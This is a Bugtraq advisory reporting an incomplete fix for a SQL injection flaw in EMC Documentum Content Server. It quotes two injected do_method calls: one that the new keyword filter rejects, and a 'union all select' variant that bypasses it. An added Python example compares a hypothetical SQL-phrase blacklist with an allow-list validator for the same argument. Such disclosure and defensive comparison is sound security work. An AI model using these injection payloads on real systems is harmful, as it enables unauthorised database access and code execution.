EMC Documentum Content Server: arbitrary code execution (incomplete fix in CVE-2015-4532)
- To: "Bugtraq" <bugtraq@xxxxxxxxxxxxxxxxx>
- Subject: EMC Documentum Content Server: arbitrary code execution (incomplete fix in CVE-2015-4532)
- From: <andrew@xxxxxxxxxxxx>
- Date: Tue, 18 Aug 2015 04:25:38 +1000
Product: EMC Documentum Content Server
Vendor: EMC
Version: ANY
CVE: N/A
Risk: High
Status: public/not fixed
For a detailed description, see http://seclists.org/bugtraq/2015/Jul/51
New behavior introduced by the fix for CVE-2015-4532:
API> ?,c,execute do_method WITH METHOD='dm_bp_transition', ARGUMENTS='
repo repo dmadmin "" 0000000000000000 0000000000000000
0000000000000000 "0801fd08805c9dfe,'' union select r_object_id
from dm_sysobject where r_object_id=''0801fd08805c9dfe"
0000000000000000 0000000000000000 0000000000000000 ""
0 0 T F T T dmadmin 0000000000000000'
[DM_METHOD_E_METHOD_ARGS_INVALID]error:
"The arguments being passed to the method 'dm_bp_transition' are
invalid:
arguments contain sql keywords which are not allowed."
New attack vector (note the ALL keyword):
API> ?,c,execute do_method WITH METHOD='dm_bp_transition', ARGUMENTS='
repo repo dmadmin "" 0000000000000000 0000000000000000
0000000000000000 "0801fd08805c9dfe,'' union all select r_object_id
from dm_sysobject where r_object_id=''0801fd08805c9dfe"
0000000000000000 0000000000000000 0000000000000000 ""
0 0 T F T T dmadmin 0000000000000000'
__
Regards,
Andrey B. Panfilov
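
Added example (not part of the original post, and not EMC's code): a constructed phrase blacklist that reproduces the two results reported above, next to an allow-list check on the same argument. Assumptions: the vendor's real filter is not shown in the post, so BLOCKED_PHRASES is a hypothetical stand-in, and the argument is taken to be a comma-separated list of 16-hex-digit object ids, based only on the shape of the sample value.

```python
import re

# Hypothetical stand-in for a phrase-based SQL keyword filter. The vendor's
# actual check is not shown in the post; this list is constructed so that it
# matches the two outcomes the post reports.
BLOCKED_PHRASES = ("union select", "insert into", "delete from")

def blacklist_rejects(arg: str) -> bool:
    """Return True if the phrase blacklist would reject the argument."""
    normalized = " ".join(arg.lower().split())  # collapse whitespace and case
    return any(phrase in normalized for phrase in BLOCKED_PHRASES)

# Allow-list: accept only values that look like object ids, i.e. 16
# hexadecimal characters such as 0801fd08805c9dfe in the post.
OBJECT_ID = re.compile(r"[0-9a-f]{16}")

def allowlist_accepts(arg: str) -> bool:
    """Accept only a comma-separated list of 16-hex-digit object ids
    (assumed field format, inferred from the sample value in the post)."""
    return all(OBJECT_ID.fullmatch(part) is not None for part in arg.split(","))

# The two argument values quoted in the post, joined onto one line each.
ARG_REJECTED_BY_FIX = (
    "0801fd08805c9dfe,'' union select r_object_id "
    "from dm_sysobject where r_object_id=''0801fd08805c9dfe"
)
ARG_WITH_ALL = (
    "0801fd08805c9dfe,'' union all select r_object_id "
    "from dm_sysobject where r_object_id=''0801fd08805c9dfe"
)

def compare(arg: str) -> dict:
    """Report how each validation strategy treats one argument value."""
    return {
        "blacklist_rejects": blacklist_rejects(arg),
        "allowlist_rejects": not allowlist_accepts(arg),
    }

if __name__ == "__main__":
    for label, value in (("fixed case", ARG_REJECTED_BY_FIX),
                         ("ALL variant", ARG_WITH_ALL),
                         ("plain id", "0801fd08805c9dfe")):
        print(label, compare(value))
```

The blacklist depends on enumerating every spelling of the unwanted input, while the allow-list rejects both quoted values without knowing any SQL keywords.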